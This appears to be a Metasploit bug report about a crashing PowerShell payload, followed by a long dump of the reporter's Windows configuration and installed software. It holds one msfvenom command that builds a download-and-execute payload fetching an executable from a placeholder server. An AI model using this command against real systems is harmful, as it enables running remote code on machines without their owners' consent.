Description
Steps to reproduce
How'd you do it?
./msfvenom -p windows/download_exec --platform windows -a x86 -e cmd/powershell_base64 -f psh EXITFUNC=thread EXE='calc.exe' URL=https://yourserver/notepad.exe VERBOSE=true --out what-dle.ps1
Run outputted powershell script
Expected behavior
Download and execute of payload
Current behavior
Does not even download, leaves an error in event viewer (could potentially be related to .net framework?)
Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: exception code c000001d, exception address 000002B75AA20006
System stuff
Metasploit version
$ git log -1 --pretty=oneline
7b7f56e (HEAD -> master, origin/master, origin/HEAD) automatic module_metadata_base.json update
I installed Metasploit with:
Installed in WSL with kali as distro
- Source install (please specify ruby version)
$ ruby -v
ruby 2.5.7p206 (2019-10-01 revision 67816) [x86_64-linux-gnu]
OS
What OS are you running Metasploit on?
Target payload: windows 10 (x64)
Payload generated under: WSL kali
We have symantec endpoint protection on as well, but the directory the payload is saved in is completely whitelisted.
Environment:
OS Information
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Original Install Date: 4/22/2019, 9:47:53 AM
System Boot Time: 1/22/2020, 1:49:06 AM
System Manufacturer: Dell Inc.
System Model: Latitude 7490
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 10 GenuineIntel ~1910 Mhz
BIOS Version: Dell Inc. 1.7.2, 11/26/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 16,259 MB
Available Physical Memory: 8,027 MB
Virtual Memory: Max Size: 29,571 MB
Virtual Memory: Available: 16,284 MB
Virtual Memory: In Use: 13,287 MB
Page File Location(s): C:\pagefile.sys
Hotfix(s): 14 Hotfix(s) Installed.
[01]: KB2693643
[02]: KB4532936
[03]: KB4456655
[04]: KB4465663
[05]: KB4486153
[06]: KB4494451
[07]: KB4497398
[08]: KB4509094
[09]: KB4512576
[10]: KB4516115
[11]: KB4521861
[12]: KB4523203
[13]: KB4530741
[14]: KB4530717
Network Card(s): 13 NIC(s) Installed.
[01]: Intel(R) Dual Band Wireless-AC 8265
Connection Name: Wi-Fi
DHCP Enabled: Yes
DHCP Server: N/A
IP address(es)
[02]: Intel(R) Ethernet Connection (4) I219-LM
Connection Name: Ethernet
Status: Media disconnected
[03]: Bluetooth Device (Personal Area Network)
Connection Name: Bluetooth Network Connection
Status: Media disconnected
[04]: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Connection Name: Ethernet 2
Status: Hardware not present
[05]: VirtualBox Host-Only Ethernet Adapter
Connection Name: VirtualBox Host-Only Network
DHCP Enabled: No
IP address(es)
[01]: 192.168.56.1
[06]: Hyper-V Virtual Ethernet Adapter
Connection Name: vEthernet (Default Switch)
DHCP Enabled: Yes
DHCP Server: 255.255.255.255
IP address(es)
[01]: 172.18.100.209
[07]: Hyper-V Virtual Ethernet Adapter
Connection Name: vEthernet (Bridgey)
Status: Media disconnected
[08]: Hyper-V Virtual Ethernet Adapter
Connection Name: vEthernet (CorpBridgey)
Status: Media disconnected
[09]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
Connection Name: Ethernet 5
Status: Media disconnected
[10]: Fortinet SSL VPN Virtual Ethernet Adapter
Connection Name: Ethernet 6
Status: Hardware not present
[11]: Array Networks SSL VPN Adapter
Connection Name: Ethernet 7
Status: Hardware not present
[12]: Microsoft Network Adapter Multiplexor Driver
Connection Name: Network Bridge
DHCP Enabled: Yes
DHCP Server: N/A
IP address(es)
[13]: Hyper-V Virtual Ethernet Adapter
Connection Name: vEthernet (WifiBridge)
DHCP Enabled: Yes
DHCP Server: 192.168.2.254
IP address(es)
[01]: 192.168.2.3
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
.NET framework information
CBS : 1 Install : 1 InstallPath : C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ Release : 528049 Servicing : 0 TargetVersion : 4.0.0 Version : 4.8.03761 PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4 PSChildName : Full PSDrive : HKLM PSProviderInstalled software
Installed software list
DisplayName : 7-Zip 18.05 (x64)
Version : 18.05
InstallDate :
Publisher : Igor Pavlov
UninstallString : C:\Program Files\7-Zip\Uninstall.exe
InstallLocation : C:\Program Files\7-Zip
InstallSource :
HelpLink :
EstimatedSizeMB : 4.93
DisplayName : MotionPro
Version : 9.4.0.0
InstallDate :
Publisher : Array Networks
UninstallString : C:\Program Files\Array Networks\MotionPro VPN Client\uninst.exe
InstallLocation :
InstallSource :
HelpLink :
EstimatedSizeMB : 0
DisplayName : Mozilla Firefox 72.0.1 (x64 en-US)
Version : 72.0.1
InstallDate :
Publisher : Mozilla
UninstallString : "C:\Program Files\Mozilla Firefox\uninstall\helper.exe"
InstallLocation : C:\Program Files\Mozilla Firefox
InstallSource :
HelpLink : https://support.mozilla.org
EstimatedSizeMB : 363.52
DisplayName : Mozilla Maintenance Service
Version : 72.0.1
InstallDate :
Publisher : Mozilla
UninstallString : "C:\Program Files (x86)\Mozilla Maintenance Service\uninstall.exe"
InstallLocation :
InstallSource :
HelpLink :
EstimatedSizeMB : 0.56
DisplayName : Notepad++ (64-bit x64)
Version : 7.8.2
InstallDate :
Publisher : Notepad++ Team
UninstallString : C:\Program Files\Notepad++\uninstall.exe
InstallLocation :
InstallSource :
HelpLink :
EstimatedSizeMB : 10.38
DisplayName : Microsoft Office 365 ProPlus - en-us
Version : 16.0.12325.20288
InstallDate :
Publisher : Microsoft Corporation
UninstallString : "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" scenario=install scenariosubtype=ARP sourcetype=None
productstoremove=O365ProPlusRetail.16_en-us_x-none culture=en-us version.16=16.0
InstallLocation : C:\Program Files\Microsoft Office
InstallSource :
HelpLink :
EstimatedSizeMB : 0
DisplayName : SDCC
Version :
InstallDate :
Publisher : sdcc.sourceforge.net
UninstallString : C:\Program Files\SDCC\uninstall.exe
InstallLocation : C:\Program Files\SDCC
InstallSource :
HelpLink : http://sdcc.sourceforge.net/
EstimatedSizeMB : 0
DisplayName : Realtek USB Audio
Version : 6.3.9600.132
InstallDate :
Publisher : Realtek Semiconductor Corp.
UninstallString : C:\Windows\system32\rundll32.exe RtSetupAPI64.dll RealtekUSBAudioInstaller -r -m
InstallLocation : C:\Program Files\Realtek\Audio\USB
InstallSource :
HelpLink :
EstimatedSizeMB : 0
DisplayName : AgentInstall-x64_15_5
Version : 15.5.0107.01001
InstallDate : 12/6/2019 12:00:00 AM
Publisher : Symantec Corp.
UninstallString : MsiExec.exe /X{11012518-A235-4178-8041-ACA48E052C60}
InstallLocation : C:\Program Files\Manufacturer\Endpoint Agent
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{04BFF634-231F-4FC3-8EA5-D54AFA45741B}\cache
HelpLink :
EstimatedSizeMB : 308.15
DisplayName : 7-Zip 19.00 (x64 edition)
Version : 19.00.00.0
InstallDate : 5/20/2019 12:00:00 AM
Publisher : Igor Pavlov
UninstallString : MsiExec.exe /I{23170F69-40C1-2702-1900-000001000000}
InstallLocation :
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{B3B76409-5860-5ACA-DF6B-FE57C3BD0954}\cache
HelpLink : http://www.7-zip.org/support.html
EstimatedSizeMB : 5.13
DisplayName : Symantec Endpoint Protection
Version : 14.0.3929.1200
InstallDate : 12/19/2019 12:00:00 AM
Publisher : Symantec Corporation
UninstallString : MsiExec.exe /I{2B448775-6A9D-4594-A59F-5F3076B67309}
InstallLocation : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.0.3929.1200.105
InstallSource : C:\Windows\Temp\6cabeb3f-2a90-4ffe-b26d-6e1e3b75fa57
HelpLink :
EstimatedSizeMB : 580.4
DisplayName : Maxx Audio Installer (x64)
Version : 2.7.9326.0
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Waves Audio Ltd.
UninstallString : MsiExec.exe /X{307032B2-6AF2-46D7-B933-62438DEB2B9A}
InstallLocation : c:\Program Files\Waves\MaxxAudio
InstallSource : c:\drivers\x64\audio\88ccc_a00-00\hdaudio
HelpLink :
EstimatedSizeMB : 108.75
DisplayName : Software Management Solution Plugin
Version : 8.5.3627.0
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Altiris Inc.
UninstallString : MsiExec.exe /I{48541466-9F58-4627-8D41-036BF19BEDC9}
InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\Software Management Solution Plugin
InstallSource : C:\WINDOWS\SETUP\SCRIPTS
HelpLink :
EstimatedSizeMB : 1.05
DisplayName : Deployment Solution Agent
Version : 8.5.3663.0
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Symantec
UninstallString : MsiExec.exe /I{493B986D-AD15-45DA-918B-CD0947307DAB}
InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\Deployment
InstallSource : C:\WINDOWS\SETUP\SCRIPTS
HelpLink : [email protected]
EstimatedSizeMB : 3.52
DisplayName : Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Version : 9.0.30729.6161
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Microsoft Corporation
UninstallString : MsiExec.exe /X{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
InstallLocation :
InstallSource : c:\aa78abb0d9d3bd34685a6c
HelpLink :
EstimatedSizeMB : 13.21
DisplayName : Symantec Endpoint Encryption Client
Version : 11.2.0 MP1
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Symantec Corporation
UninstallString : MsiExec.exe /X{7B5C708A-E3A9-40F0-8ABE-97EC534B98BF}
InstallLocation :
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{A8B9CB7A-BE8E-4A59-86BE-C0BB27645A86}\cache
HelpLink : www.symantec.com/bussiness/support/
EstimatedSizeMB : 121.52
DisplayName : FortiClient VPN
Version : 6.2.1.0831
InstallDate : 8/29/2019 12:00:00 AM
Publisher : Fortinet Technologies Inc
UninstallString : MsiExec.exe /X{8C9E2A28-ED82-4192-8CC0-1BF2BB379435}
InstallLocation : C:\Program Files\Fortinet\FortiClient
InstallSource : C:\ProgramData\Applications\Cache{8C9E2A28-ED82-4192-8CC0-1BF2BB379435}\6.2.1.0831
HelpLink :
EstimatedSizeMB : 195.5
DisplayName : Office 16 Click-to-Run Licensing Component
Version : 16.0.12325.20280
InstallDate : 1/22/2020 12:00:00 AM
Publisher : Microsoft Corporation
UninstallString : MsiExec.exe /I{90160000-007E-0000-1000-0000000FF1CE}
InstallLocation :
InstallSource : c:\program files\microsoft office\root\integration
HelpLink :
EstimatedSizeMB : 4.81
DisplayName : Office 16 Click-to-Run Extensibility Component
Version : 16.0.12325.20288
InstallDate : 1/22/2020 12:00:00 AM
Publisher : Microsoft Corporation
UninstallString : MsiExec.exe /X{90160000-008C-0000-1000-0000000FF1CE}
InstallLocation :
InstallSource : c:\program files\microsoft office\root\integration
HelpLink :
EstimatedSizeMB : 30.95
DisplayName : Office 16 Click-to-Run Localization Component
Version : 16.0.12325.20288
InstallDate : 1/22/2020 12:00:00 AM
Publisher : Microsoft Corporation
UninstallString : MsiExec.exe /X{90160000-008C-0409-1000-0000000FF1CE}
InstallLocation :
InstallSource : c:\program files\microsoft office\root\integration
HelpLink :
EstimatedSizeMB : 0.05
DisplayName : Altiris Application Metering Agent
Version : 8.5.3687.0
InstallDate : 4/23/2019 12:00:00 AM
Publisher : Symantec Corporation
UninstallString : MsiExec.exe /I{91EBE1C2-0AC6-42A9-A5B7-21430EFD905A}
InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\Application Metering Agent
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{9A125D17-657E-460D-A897-5E96E0BFBAC1}\cache
HelpLink : http://http://www.altiris.com/support/
EstimatedSizeMB : 1.92
DisplayName : Dell Touchpad
Version : 10.3201.101.108
InstallDate :
Publisher : ALPS ELECTRIC CO., LTD.
UninstallString : C:\Program Files\DellTPad\Uninstap.exe ADDREMOVE
InstallLocation : C:\Program Files\DellTPad
InstallSource :
HelpLink :
EstimatedSizeMB : 0
DisplayName : IBSA
Version : 4.5.110
InstallDate : 8/28/2019 12:00:00 AM
Publisher : Phantom
UninstallString : MsiExec.exe /X{AE4231FD-C6BB-4B19-AE83-276E47C145B2}
InstallLocation : C:\Program Files\Phantom\IBSA
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{5923EC37-DFC7-4CE6-81E4-784D2DCD9228}\cache
HelpLink :
EstimatedSizeMB : 12.32
DisplayName : Google Chrome
Version : 79.0.3945.117
InstallDate : 1/10/2020 12:00:00 AM
Publisher : Google LLC
UninstallString : MsiExec.exe /X{B0ADCD48-32BE-3E01-89F3-CA3224594A8B}
InstallLocation :
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{B526089E-F45D-6FFF-60B4-9528E26F3422}\cache
HelpLink :
EstimatedSizeMB : 58.08
DisplayName : Oracle VM VirtualBox 6.1.0
Version : 6.1.0
InstallDate : 12/19/2019 12:00:00 AM
Publisher : Oracle Corporation
UninstallString : MsiExec.exe /I{B9B53CFE-C4E3-47FB-9BC0-8022F0AB6814}
InstallLocation :
InstallSource : C:\Windows\TEMP\VirtualBox
HelpLink :
EstimatedSizeMB : 216.22
DisplayName : Altiris Inventory Agent
Version : 8.5.3687.0
InstallDate : 5/20/2019 12:00:00 AM
Publisher : Symantec Corporation
UninstallString : MsiExec.exe /I{B9C8C6C5-8EE0-4196-96E7-118F563EA40B}
InstallLocation : C:\Program Files\Altiris\Altiris Agent
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{5864027D-DA99-4430-9183-4EFF8B362383}\cache
HelpLink : http://www.altiris.com
EstimatedSizeMB : 7.14
DisplayName : Local Administrator Password Solution
Version : 6.2.0.0
InstallDate : 10/7/2019 12:00:00 AM
Publisher : Microsoft Corporation
UninstallString : MsiExec.exe /I{EA8CB806-C109-4700-96B4-F1F268E5036C}
InstallLocation :
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{53E69F29-564A-4BAE-B82F-BAA13781F72A}\cache\Files
HelpLink :
EstimatedSizeMB : 0.13
DisplayName : Patch Management Agent
Version : 8.5.3622.0
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Symantec
UninstallString : MsiExec.exe /I{F107B84C-B72A-4C2A-90EE-796948012F3E}
InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\PatchMgmtAgent
InstallSource : C:\WINDOWS\SETUP\SCRIPTS
HelpLink : http://symantec.com/business/support
EstimatedSizeMB : 5.29
DisplayName : Cisco AnyConnect Secure Mobility Client
Version : 4.4.03034
InstallDate :
Publisher : Cisco Systems, Inc.
UninstallString : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\Uninstall.exe -remove
InstallLocation :
InstallSource :
HelpLink : http://www.cisco.com/TAC/
EstimatedSizeMB : 5.86
DisplayName : SDCC
Version :
InstallDate :
Publisher : sdcc.sourceforge.net
UninstallString : C:\Program Files (x86)\SDCC\uninstall.exe
InstallLocation : C:\Program Files (x86)\SDCC
InstallSource :
HelpLink : http://sdcc.sourceforge.net/
EstimatedSizeMB : 0
DisplayName : VLC media player
Version : 3.0.8
InstallDate :
Publisher : VideoLAN
UninstallString : "C:\Program Files (x86)\VideoLAN\VLC\uninstall.exe"
InstallLocation : C:\Program Files (x86)\VideoLAN\VLC
InstallSource :
HelpLink :
EstimatedSizeMB : 0
DisplayName : Realtek Audio COM Components
Version : 1.0.2
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Realtek Semiconductor Corp.
UninstallString : MsiExec.exe /I{2355B503-9B11-4449-861D-1C1748B26320}
InstallLocation :
InstallSource : C:\Program Files\Realtek\Audio\HDA
HelpLink :
EstimatedSizeMB : 0.58
DisplayName : Java 8 Update 201
Version : 8.0.2010.9
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Oracle Corporation
UninstallString : MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F32180201F0}
InstallLocation : C:\Program Files (x86)\Java\jre1.8.0_201
InstallSource : C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Oracle\Java\jre1.8.0_201
HelpLink : https://java.com/help
EstimatedSizeMB : 102.32
DisplayName : Java 8 Update 231
Version : 8.0.2310.11
InstallDate : 11/14/2019 12:00:00 AM
Publisher : Oracle Corporation
UninstallString : MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F32180231F0}
InstallLocation : C:\Program Files (x86)\Java\jre1.8.0_231
InstallSource : C:\Users\period\AppData\LocalLow\Oracle\Java\jre1.8.0_231
HelpLink : https://java.com/help
EstimatedSizeMB : 35.88
DisplayName : Adobe Shockwave Player 12.3
Version : 12.3.5.205
InstallDate : 5/30/2019 12:00:00 AM
Publisher : Adobe, Inc
UninstallString : MsiExec.exe /X{4487064C-F31E-4499-A1EF-9B8E809A0358}
InstallLocation : C:\Windows\SysWOW64\Adobe
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{200158F2-B292-0460-AFBF-5A2723AFFC23}\cache
HelpLink : http://www.adobe.com/support/shockwave
EstimatedSizeMB : 52.4
DisplayName : Java Auto Updater
Version : 2.8.231.11
InstallDate : 11/14/2019 12:00:00 AM
Publisher : Oracle Corporation
UninstallString :
InstallLocation :
InstallSource : C:\Users\period\AppData\LocalLow\Oracle\Java\jre1.8.0_231
HelpLink :
EstimatedSizeMB : 1.93
DisplayName : XCP-ng Center 7.6.0
Version : 7.6.0.9
InstallDate : 9/30/2019 12:00:00 AM
Publisher : XCP-ng
UninstallString : MsiExec.exe /X{4C738D9E-4BB1-4CD6-95A6-8DC803E85241}
InstallLocation :
HelpLink :
EstimatedSizeMB : 22.86
DisplayName : Citrix XenCenter
Version : 6.1.3
InstallDate : 9/30/2019 12:00:00 AM
Publisher : Citrix Systems, Inc.
UninstallString : MsiExec.exe /X{5800A2A9-0DBF-4F46-9B7B-CCA602BDE6A1}
InstallLocation :
HelpLink :
EstimatedSizeMB : 63.33
DisplayName : VIP Access
Version : 2.2.4.44
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Symantec Corporation
UninstallString : MsiExec.exe /X{58594A65-ACD7-41A2-B6ED-2597777F2850}
InstallLocation : C:\Program Files (x86)\Symantec\VIP Access Client
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{7B008651-73C9-4979-840A-04670CF32FFA}\cache\Files\VIPAccess_Installer
HelpLink :
EstimatedSizeMB : 11.64
DisplayName : Realtek Card Reader
Version : 10.0.15063.21300
InstallDate :
Publisher : Realtek Semiconductor Corp.
UninstallString : C:\Windows\RtCRU64.exe /u
InstallLocation :
InstallSource :
HelpLink :
EstimatedSizeMB : 14.65
DisplayName : Google Update Helper
Version : 1.3.35.341
InstallDate : 12/6/2019 12:00:00 AM
Publisher : Google LLC
UninstallString : MsiExec.exe /I{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
InstallLocation :
InstallSource : C:\Program Files (x86)\Google\Update\1.3.35.341
HelpLink :
EstimatedSizeMB : 0.04
DisplayName : MirrorOp
Version : 2.0.0.23
InstallDate : 5/20/2019 12:00:00 AM
Publisher : AWIND Inc
UninstallString : MsiExec.exe /X{6edc8ea3-5cba-4942-8313-540b6ea7571e}
InstallLocation : C:\Program Files (x86)\MirrorOp
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{CF0426B7-2C7F-4828-ADE4-A5ED9B027DC3}\cache
HelpLink :
EstimatedSizeMB : 30.2
DisplayName : Teams Machine-Wide Installer
Version : 1.2.0.19260
InstallDate : 8/29/2019 12:00:00 AM
Publisher : Microsoft Corporation
UninstallString : MsiExec.exe /I{731F6BAA-A986-45A4-8936-7C3AAAAA760B}
InstallLocation :
InstallSource : C:\Program Files\Microsoft Office\root\integration\Addons
HelpLink :
EstimatedSizeMB : 90.39
DisplayName : Cisco AnyConnect ISE Posture Module
Version : 4.4.03034
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Cisco Systems, Inc.
UninstallString : MsiExec.exe /X{9317038A-8547-41F1-B8EA-154CFF895610}
InstallLocation : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{AFC6812E-CD0E-4BCB-991D-C2D20924EB6D}\cache
HelpLink : http://www.cisco.com/TAC/
EstimatedSizeMB : 1.94
DisplayName : Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Version : 9.0.30729.6161
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Microsoft Corporation
UninstallString : MsiExec.exe /X{9BE518E6-ECC6-35A9-88E4-87755C07200F}
InstallLocation :
InstallSource : c:\01dd7fa27055585cb016
HelpLink :
EstimatedSizeMB : 10.2
DisplayName : Cisco AnyConnect ISE Compliance Module
Version : 3.6.11098.2
InstallDate : 7/8/2019 12:00:00 AM
Publisher : Cisco Systems, Inc
UninstallString : MsiExec.exe /I{A390D36F-3DA8-4581-9887-04905A71044C}
InstallLocation : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\opswat
InstallSource : C:\Windows\TEMP\install\A71044C
HelpLink : http://www.cisco.com/TAC/
EstimatedSizeMB : 13.76
DisplayName : Adobe Refresh Manager
Version : 1.8.0
InstallDate : 10/17/2019 12:00:00 AM
Publisher : Adobe Systems Incorporated
UninstallString : MsiExec.exe /I{AC76BA86-0804-1033-1959-000182435289}
InstallLocation : C:\Program Files (x86)\Common Files\Adobe\ARM\1.0
InstallSource : C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\Cache
HelpLink : http://www.adobe.com/support/main.html
EstimatedSizeMB : 1.66
DisplayName : Adobe Acrobat Reader DC
Version : 19.021.20061
InstallDate : 12/20/2019 12:00:00 AM
Publisher : Adobe Systems Incorporated
UninstallString : MsiExec.exe /I{AC76BA86-7AD7-1033-7B44-AC0F074E4100}
InstallLocation : C:\Program Files (x86)\Adobe\Acrobat Reader DC
InstallSource : C:\ProgramData\Adobe\Setup{AC76BA86-7AD7-1033-7B44-AC0F074E4100}
HelpLink : http://www.adobe.com/support/main.html
EstimatedSizeMB : 307.08
DisplayName : Cisco Jabber
Version : 12.6.1.34405
InstallDate : 10/24/2019 12:00:00 AM
Publisher : Cisco Systems, Inc
UninstallString : MsiExec.exe /X{B87384BE-C083-43F9-9E16-1C2B7380FB2E}
InstallLocation : C:\Program Files (x86)\Cisco Systems\Cisco Jabber
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{01286FD0-05D3-4F07-8E64-97845BA9F9E5}\cache\Files
HelpLink :
EstimatedSizeMB : 400.14
DisplayName : Cisco AnyConnect Secure Mobility Client
Version : 4.4.03034
InstallDate : 4/22/2019 12:00:00 AM
Publisher : Cisco Systems, Inc.
UninstallString : MsiExec.exe /X{EB629A98-5E69-40E8-BA9E-C393899F959D}
InstallLocation : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client
InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery{0AA4A901-0D66-4D55-B292-3B544F40A5BB}\cache
HelpLink : http://www.cisco.com/TAC/
EstimatedSizeMB : 16.02
DisplayName : Ant Video downloader (Native messaging host)
Version : 4.3
InstallDate : 11/27/2019 12:00:00 AM
Publisher : Ant.com
UninstallString : MsiExec.exe /X{EF61BF45-53FF-41A8-96C9-0527735FE8CE}
InstallLocation :
HelpLink : http://support.ant.com/
EstimatedSizeMB : 36.51
DisplayName : Intel(R) Processor Graphics
Version : 24.20.100.6286
InstallDate :
Publisher : Intel Corporation
UninstallString : "C:\Program Files (x86)\Intel\Intel(R) Processor Graphics\Uninstall\igxpin.exe" -uninstall
InstallLocation : C:\Program Files (x86)\Intel\Intel(R) Processor Graphics
InstallSource :
HelpLink :
EstimatedSizeMB : 74.22
DisplayName : Realtek High Definition Audio Driver
Version : 6.0.1.8555
InstallDate :
Publisher : Realtek Semiconductor Corp.
UninstallString : C:\Program Files\Realtek\Audio\HDA\RtlUpd64.exe -r -m -nrg2709
InstallLocation : C:\Program Files\Realtek\Audio\HDA
InstallSource :
HelpLink :
EstimatedSizeMB : 0